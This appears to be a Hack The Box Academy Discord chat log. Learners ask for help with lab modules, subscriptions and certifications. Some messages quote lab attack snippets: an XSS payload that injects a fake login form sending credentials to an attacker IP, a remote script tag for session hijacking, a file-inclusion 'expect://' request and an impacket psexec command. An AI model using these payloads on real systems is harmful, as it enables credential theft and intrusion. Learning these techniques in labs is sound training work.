I can't progress on different paths because of my lack of cubes
do I have to pay for a subscription or something?
Do you use Obsidian's Canvas feature or something to keep track of your attack path during an engagement?
I'm currently struggling in coming up with a way to keep track of what I've done in an engagement. I'm assuming the Documenting module will cover that?
I use the excalidraw plugin, but I haven't found making diagrams helpful even for complex stuff, usually just a descriptive heading and reading the commands will do but YMMV
you can also give people your referral link
they have to purchase a subscription though for you to get cubes
only its like 20eu instead of 16
taxes go crazy
So the method you primarily use is multiple note files linked to one-another. A note file representing one finding/vulnerability?
good to know thank you
nope I just use one file for one engagement with different heading levels for different things, but this is really down to preference
Some sort of plugin you use to have a bird's eye view of the headings? Cuz I imagine the file can get quite long.
I'm still exploring ways, so don't have many preferences set yet. Tryna hear what people use, and then test and combine those ways to find my own.
you can see the headings in the right sidebar
Really? It doesn't show for me in Obsidian.
Holy, I never noticed it... Thanks
I've noticed Heading 1 doesn't show, why is that?
Is it considered to be Title?
it does for me
Sorry, I missed the message. Can I DM u??
Have you posted the script anywhere?
Hello, may I ask why my PWNbox cannot be opened?
Have you tried refreshing?
Sorry, I didn't understand the meaning of refreshing, but I tried restarting the web page and exiting the browser
yeah restarting the web page is refreshing it
Flush your cookies and try again
I have not, it was a real pain to write so I'd just use it for myself
<@&861185840277487616> spam in all channels
Thank you, I cleared the cookies and can enable them
Can Pwnbox save its own content? I remember that it can save some of the user's content.
I've done my first ever hack with metasploit (on the Cracking HTB path)
I'm very proud
do I call myself a hacker now?
no we call you skid
Does anyone know what the purpose of using dnscat2 was in the module on Pivoting, Tunneling, and Port Forwarding, specifically in the section on DNS Tunneling with Dnscat2? I was able to get the flag without creating a session with dnscat2
nice
feels good
wait is skid like the lowest
skid as in beginner/new/baby in this, type shit?
script kiddy
Not for Academy, or at least not much
Skid means you run scripts without knowing what they do
Then complain when your copy/paste doesn't work without reading the error
ye ye i mean
am i one level above from before
thats what i meant
or i still dont know how to explain it
OH
was i a skid from the very beginning or nah
those are noobs or something less
type
No
dang
Hi there, in AD skills assessment part 2 I'm on SQL01 with system level privileges. I would like to transfer some files to the Parrot OS attack box with smbserver. I think I have set it up properly; in fact, when I copy the files I receive "connection received" with the relative hash, but the files are not transferred to my Parrot box. What can possibly be the problem?
d4rkcr4ck3r is a scammer guys take care of him
If it's someone random DMing you, message a mod/admin
ping him
or better yet hack him
Seems they aren't in the server (or mobile is being dumb)
This isn't a revenge hacking server
We genuinely don't care
Thank you
Idk what you expected out of "take care of him"
Take care not to scam anyone
lmao
Since it seems unrelated to HTB, and seems sus af I'm declining
Yeah you're trying to hack a fucking lottery system you nonce
It's not even a shitty web challenge
<@&861185840277487616> literally wants help to hack a lottery
did you have to download another wordlist or is the wordlist mentioned in the modules/on pwnbox
just the default wordlists, if you get no results then move on
I could use those winning numbers. I'd give you all a free tier 4 module
Im good lmao
yessirrr subscription
is the host needed to get further into the network
if i cancel my subscription will it stay active until the end of the month?
because i can only see three hosts, one that i have system on, this one, and the domain controller
It'll stay active until the next billing cycle
oh good
So whenever it would renew the next time
Guys i get access to the flag in SOCKS5 Tunneling with Chisel module Pivoting, Tunneling, and Port Forwarding , but it says that the flag is wrong, could it be that someone altered the flag by mistake?
The question of the module is this one>
Using the concepts taught in this section, connect to the target and establish a SOCKS5 Tunnel that can be used to RDP into the domain controller (172.16.5.19, victor:pass@123). Submit the contents of C:\Users\victor\Documents\flag.txt as the answer.
ye I got you, thank you
Flags can't be altered by other users
Should i open a ticket?
It starts with H and ends with !
Make sure no additional spaces or anything like that
Bro.... My mistake, i was entering the wrong flag
You're likely looking in the wrong place then
Wait
Wrong section I'm looking at
It starts with T and ends with !
Sorry, my bad lol
I'm used to people getting stuck on the double pivot section of this module
Yup, i was looking in the wrong place :c
Hello, in the final part of the Windows Fundamentals module there's a question asking to get the SID of a user you create manually. Aren't SIDs unique? I've tried everything and I always get it wrong
maybe try this? https://www.lifewire.com/how-to-find-a-users-security-identifier-sid-in-windows-2625149
SIDs are unique in that two users will not share the same SID. But just because each user has their own SID, does not necessarily mean the SID is impossible for us to find
Yep, did exactly that. Everything lines up for the first part (S-1-5-21) as in the hint, but still counts as incorrect.
can you show me?
i got "S-1-5-21-2614195641-1726409526-3792725429-1004", copy pasted that but it's incorrect
okay but where are you getting that from?
wmic useraccount get name,sid in powershell
can you show me a screenshot?
any chance you created a new user and then deleted them ?
I think i did
yep thats the problem . Respawn the target machine, make a new user named jim, and then run that command
alright, tyvm!
yes, I ended up using the extraSIDs attack yesterday to pwn a parent domain
feelsgoodman
Congrats! I searched about exactly that, and a couple sites said it was all RNG. Interesting, thank you guys
nice work
Admins 5xx, users 1xxx at the end
and everytime we add a new user, the corresponding SID goes up incrementally
Which is why it's extra important to trim dead SIDs
Proper user management
Oi <@&861185840277487616> they're back
I would like to ask why I use xfreerdp /u:administrator /p:'xxxx' /v:10.129.xx.xx. After a few clicks, the entire target becomes invalid. I cannot ping directly and cannot operate anything. regenerate
Try switching vpn regions
If it's consistent regardless of vpn region, message support
depending on the lab , you may need to give the target a few minutes to fully boot up
Doing Kerberos Attacks:Constrained Delegation from Linux and I got the following error
anyone has any idea why this could happen ?
I am working on the phishing section of the CROSS scripting module and I don't know what I am doing wrong:
The link to the module and the question:
https://academy.hackthebox.com/module/103/section/984
"Try to find a working XSS payload for the Image URL form found at '/phishing' in the above server, and then use what you learned in this section to prepare a malicious URL that injects a malicious login form. Then visit '/phishing/send.php' to send the URL to the victim, and they will log into the malicious login form. If you did everything correctly, you should receive the victim's login credentials, which you can use to login to '/phishing/login.php' and obtain the flag. "
The payload I generated after sending this command ||(document.write('<h3>Please login to continue</h3><form action=http://10.10.15.204><input type="username" name="username" placeholder="Username"><input type="password" name="password" placeholder="Password"><input type="submit" name="submit" value="Login"></form>');)|| to the 'Online Image Viewer' input of this link (http://10.129.127.112/phishing/index.php):
And then when I try to execute the above command (after creating the index.php file that contain my Machine IP address and issuing the command ||sudo php -S 0.0.0.0:8181|| on pwnbox) in the input box on this link(http://10.129.127.112/phishing/send.php) I get the 'Issue in sending URL!' error
for INTRODUCTION TO DIGITAL FORENSICS - Skills Assessment, we are supposed to run Velociraptor collections and download CSV and JSON files? How are we to analyze these, I see we have no python or other tools. Just open them up and manually sift through them?
this might be a dumb question, but you have DC01 added to your hosts file right?
this might be a dumb answer, but I did add DC01 to my hosts file
maybe try using describeTicket.py against your ccache file?
I will see, thank you for the suggestion
everything looks right.. is your impacket updated to the most recent version?
Specify port with your ip
port for which IP ?
10.10.15.204:8181
yes, I removed the old one and installed it again
but i don't believe it's from impacket, since NetExec shows similar error
I still get the same issue:
Isn't the port for both the php command and the port for the home IP address suppose to be the same?
|| sudo php -S 0.0.0.0:8081
document.write('<h3>Please login to continue</h3><form action=http://10.10.15.121:8081><input type="username" name="username" placeholder="Username"><input type="password" name="password" placeholder="Password"><input type="submit" name="submit" value="Login"></form>');||
Try to close java script
i remember crackmapexec using a ton of impacket libraries, so i suspect netexec probably has similar dependencies. I just worked through the lab on my end , feel free to DM if you want to compare notes.
the errors are related to authentication, looks like you have a ccache file with bad creds or creds that can't auth against the target
yea, we can't see what he entered for beth.richards password... but i can see he is using impacket v 0.9.19, when on my end i'm using v0.11.0
[HTTP ATTACKS - HTTP RESPONSE SPLITTING]
Hey guys!
Currently working on question of this section. My payload worked for user, but still struggling with admin.
Can I have a nudge?
same error occurs even with new version on impacket
Thanks that fixed it
that will be great
That error means invalid creds
but the creds are not a part of the attack, I am passing a ticket to authenticate with
the ccache file is the creds in this case
you can DM me your commands to obtain the ccache i can verify for you if it looks right
sure thing
Don't know if this is the right place to ask but, on the file inclusion skill assessment, I am REDOING it for practice, and it's not working (Positive I am doing it correctly as well). Is this a common issue? I don't want to release any spoilers though. Is there anyone I could DM perhaps?
The log poisoning tends to get bugged at times; I had to reset the target
you can dm me
yo anyone know the answer to this question " Using the skills acquired in this and previous sections, access the target host and search for the file named 'waldo.txt'. Submit the flag found within the file.'
it's on INTRODUCTION TO WINDOWS COMMAND LINE
It happened again!
This time, I am using VPN region US-Academy-2. SSH completes, but immediately after that exits. Doesn't give me a shell.
nmap scan on the target works. But I cannot SSH into it
I have been trying to do this exercise since like forever, but SSH never succeeds. I have tried changing VPN regions, but to no avail.
The screenshot shows that you are actually in an SSH session
Enumerate the target Oracle database and submit the password hash of the user DBSNMP as the answer.
How to do this, I have used sqlplus scott/tiger@<ip>/XE as sysdba
how to solve this
help me with this
@icy bramble hey, are you stuck at Child->Parent Trust from Windows?
You can DM me if still stuck
did you guys figure it out? if not, use only the FQDN for impacket and let it get the information from the ticket itself
i.e. psexec.py DC01.INLANEFRIEGHT.LOCAL -k -no-pass
can I ping someone for the module: MODERN WEB EXPLOITATION TECHNIQUES
hello guys, in the linux privesc skills assessment, Note: There is a way to obtain a shell on the box instead of using the SSH credentials ... Can any1 point me in the right direction? I tried to enumerate the web app for any vulnerabilities, bruteforced the tomcat login on port 8080, and mysqlx doesn't seem to be anything of value
Hi there everyone!
I'm doing the CPTS path. I'm at Footprinting -> DNS
I've reached the last question on discovering subdomains using bruteforce. I have tried ALL lists within the SecLists folder, and none returns the x.x.x.203 IP for the network. What is my error?
hi guys, I'm doing the CDSA path, I'm at windows event logs & finding devil. I'm trying to answer the two questions: "By examining the logs located in the "C:\Logs\DLLHijack" directory, determine the process responsible for executing a DLL hijacking attack. Enter the process name as your answer. Answer format: _.exe" and "By examining the logs located in the C:\Logs\Dump directory, determine the process that performed an LSASS dump. Enter the process name as your answer. Answer format: _.exe" but I can't find the answer, can someone help me pls?
What is this format? F9L8? I don't get what it means.
because I would also like to switch to splunk
F9L8 is an example user name, but all user names were just 4 letters using A-Z and 0-9, so there is a very limited space of user names available
Ahh, okay. Thanks.
If you use PowerShell you can read logs with ID 7 that have an unsigned DLL
As for lsass, it's read ID ProcessAccess (idk what's this ID, I forgot) and target is lsass, source doesn't belong in system32 (as some Windows processes need access normally)
you say I do it first from powershell compared to event viewer
Itโs gonna be a lot easier to filter from powershell
ok thank you
hey!
hi
has the spawning been this slow lately?
alright well
Once you gain access to 'user2', try to find a way to escalate your privileges to root, to get the flag in '/root/flag.txt'.
uhh privilege escalation/cracking into hackthebox
how am I supposed to escalate to root privileges
can i get some help please
@stable bone sure
nvm got it
I managed to find the first one, I'm missing the last one
that is, the one with lsass
how are u filtering lsass
dm?
Sorry, this is definitely not the right spot but I don't know what to do. I don't have the ability to message in any HTB Serious Discussion threads or Off-topic, I'm new here, is that normal??
@urban sage Sorry for the ping, figured this was a question for mods, hope that's allowed!
Lol, that is embarrassing, I swear I read it, I just missed that vital part! Thank you so much!
Glad you figured it out. :D
I am doing the CROSS-SITE SCRIPTING (XSS) path and I am stuck at the session hijacking module
can anyone please help me
I am using this payload: <script src=http://<ip>:3333/script.js></script>
where should I inject this? I tried in the profile URL text box
no response
I have saved script.js and index.php and the php server is running
but I am not able to find the cookie
Throughout this section they've mentioned PasswordComplexity=1. What does it mean?
I'm assuming it's a LAPS setting?
https://learn.microsoft.com/en-us/windows-server/identity/laps/laps-concepts-passwords-passphrases#password-character-sets
There's been no mention about LAPS so far in the module, but it seems to make sense. Thanks.
it's just a flag on whether complexity req is enforced
Flag that indicates whether the operating system MUST require that passwords meet complexity requirements. If this flag is set, it indicates that passwords MUST meet a specific minimum requirement.
it's weird
This value MUST be between 0 and 2^16
so 1 and 2 mean required?
A value of 0 indicates that no password complexity requirements apply. Any other valid value indicates that password complexity requirements apply.
DM
Thanks. But it doesn't specify what the complexity is?
Oh, found it. There's minimum requirements.
the complexity is determined by the other values
Just so I know, how did you find this link? As in what was your search query.
So it doesn't necessarily need to follow the image I sent, it depends on what's defined in the policy?
active directory policy "PasswordComplexity"
Just found this when I continued reading.
Btw @next bronze if you don't mind me asking, how much recognition has CPTS got in SG?
that's just the minimum, the other values will override it if it's more strict, i.e. Minimum password length: 8
people working in the field know it, but you'd still need oscp
I see. Thanks. Got any idea how likely it would be for a fresh grad to get a job and work visa sponsorship with CPTS + OSCP?
I don't know. getting a company willing to sponsor is the hard part
Alrighty, I figured as much. Thanks.
you can check what roles are open and contact those companies
By the time I get CPTS and then OSCP, I'll no longer be a "fresh grad" but just a grad with no experience 
try landing internships to build experience, and it will be much easier to move to full time afterwards
Hey, just completed the linux fundamentals module. Finally.... There were great exercises at the beginning and the middle sections of the module, which I enjoyed solving. But towards the end, there were more theoretical sections without any exercises..... Nevertheless, I studied them also diligently and made notes. Those end sections demonstrated many methods, like how to configure different tools, which I didn't replicate on my VM as that would take a lot of time, doing that for each section. I think when I encounter these tools, I will learn. Am I correct? Should I replicate each method like how to mount NFS, how to configure a firewall, how to use AppArmor, how to use Docker, etc.....? Can I just have theoretical knowledge of them now and, when the time comes to use them, as I have already developed a familiarity, I would learn to use them?
or do both at the same time, internship and studying for certs
I've got one internship under my belt but it's just a regular IT internship.
I've thought about that, but it wouldn't work with my current situation. Maybe I'll knock out the CPTS first, and then try getting an internship while doing OSCP.
that's still pretty good, I don't think pentesting internships exist
Yeah, they're quite rare.
Drawbacks
if you can get CPTS you can knock OSCP out in a month
What about going through all the content (80% of the course) and all the challenge labs for the bonus points? Can it be done in a month? Is it really that easy compared to CPTS?
I don't think you necessarily need to replicate them but just read those up and get familiar with how to spot them
I did it in 2 weeks so 
Including bonus points??
yeah the bonus points are easy to get
That's what I am doing currently, by taking extensive notes..
cool, now it tells us server load
I should let you know that this CPTS course is my very first time dealing with this much pentesting stuff, max I've done in the past was some metasploit stuff.
Think it's still ok to do the OSCP that quickly after CPTS?
Review and comparison between the CPTS and OSCP certifications, and some tips on passing the exam.
I also heard from someone that when doing the OSCP labs to avoid using the kernel exploits path and go for solving the boxes by misconfiguration? It's supposed to be better for practice?
Read it already before starting the Penetration Tester path.
are there even many kernel exploits in oscp? can't remember but do a bit of everything and be ready for whatever they throw at you imo
Alrighty. I wouldn't know since I haven't taken the course yet.
that's the case for many people, you'll be fine
Reading the part about writing custom code on your OSCP exam got me a little shocked for some reason the first time I read it.
Just wasn't expecting that, but like you said, there might've been another easier attack path available.
Great blog for a beginner like me to understand how to take the maximum benefit of HTB Academy...... read the initial part, saved it to complete. BTW, can you please elaborate on your avoiding to ask for help thing? Like everywhere people say it is okay to use writeups. What should I do if I am stuck on a question for an hour or two or a day? Please explain. Would love to know the thought process and implement it in my learning.
Thats right
I'm not saying don't ask for help, I'm saying the process to find the solution yourself will be more rewarding and meaningful than simply just reading a writeup. if you've exhausted all your options, ask by all means. but make sure you've done your due diligence before that
Okay.... so exhausting my all known options is the line..... got it.... BTW, what is the max time u gave to a problem during the CPTS path ?
I don't remember
I don't have a hard limit on it
Can I ask you a quick question regarding another module: modern web exploitation techniques?
I haven't done that module
can someone help me with the enumeration with nmap boxes in academy
I have a question about the final challenge of the Shells and Payloads module.
||When I am trying to enumerate host 1 using Parrot foothold box, is my only option for accessing web based interfaces using the Links 2 browser or am I missing something?||
||I guess I can use the browser built into burp suite actually||
Can anyone help me a little bit with the wrapper section in the file inclusion module? I can retrieve the flag using the data and input wrappers, but the expect wrapper does not work. I've already checked that the Apache configuration has extension=expect. Then I directly use the command curl -s "http://ip:port/index.php?language=expect://id". Am I missing something?!
firefox in terminal
now, i'm trying to use event viewer
Thanks, I completed the flag using the burp suite chromium browser but this will be good to know for later.
Any idea why firefox doesn't show up when searching for applications? Or has it just been hidden on purpose to make you use your brain?
Still need help? We can move it to DMs
Not for now, but if I need it I'll contact you
thanks
However I managed to find the answer
Through event viewer?
yesss
Would you like to know the powershell method
is someone free to help me for the modern web exploitation techniques?
I used the keyword: lsass.exe and went through every registry that had that word to check the responsible process.
I did the simplest thing ever
That's not efficient I've sent you powershell
i know
Basically, i checked in event viewer the order of the fields and filter in powershell
but in the meantime I succeeded
i've seen
Ok great
I am stuck at the OTP section of the updated broken authentication - skill assessment. I tried with multiple digit codes up to 6 and it didn't work. I don't know how to figure out what the length of the OTP is either and there is nothing from what I can see in the code to tell otherwise. Any tips?
Hey. Anyone did the C2 sliver module and can give me a hint for the first question of the Skill A.b part? I tried Kerberoasting, Seatbelt, etc but can't find anything
Quick question: I'm planning to start Senior Web Penetration Tester path which requires 7500 cubes. If I get Platinum Monthly, will it make 36% discount for the modules?
That's not how the discount works
The discount is the # of cubes you get compared to outright purchasing the same amount
It's not a discount on the modules themselves
Oh so if you get 1000 cubes directly it's 100 dollars but if you get monthly platinum it's 68 dollars so 36% discount?
Bingo
I'm disappointed lmao
you're still getting cubes for cheaper
Probably a good idea to do the CBBH first
It's an advanced cert after all
eh CBBH isn't necessarily needed if you already have knowledge of the domains covered in it
almost done that, that's why I wanted to start the other one
yeah thanks for consoling lol
cool the modules tend to cost about 500 cubes so you can slowly work through them as you get more cubes
sounds like a good idea! will have more time to grasp the contents hahah
@vestal dust i don't accept unsolicited DMs
Hey I'm on windows file transfer I made a python http server with python3 -m http.server 8080 and then attempt to iwr using http://IP:8080/upload_win.zip -OutFile upload_win.zip but I'm getting an unable to connect to the remote server error. Did I mess up with the http server or am I missing something else?
did you switch ip for your tun0 ip?
oh no I thought it was the target ip that could be the problem
how would the target IP have the file to download
Lol my bad thank you!
did you do the :debug?
or what ever the correct command is
let me take a look since im speaking out from my head
shouldn't you speak out from your mouth
Can anyone recommend me I am totally new for which path I should choose
information security fundamentals skill path
I started this, but in Setting Up and Organization there are some points where very complex code is written and I am not able to understand a single bit of it, so what should I do
?
take notes, google what you don't understand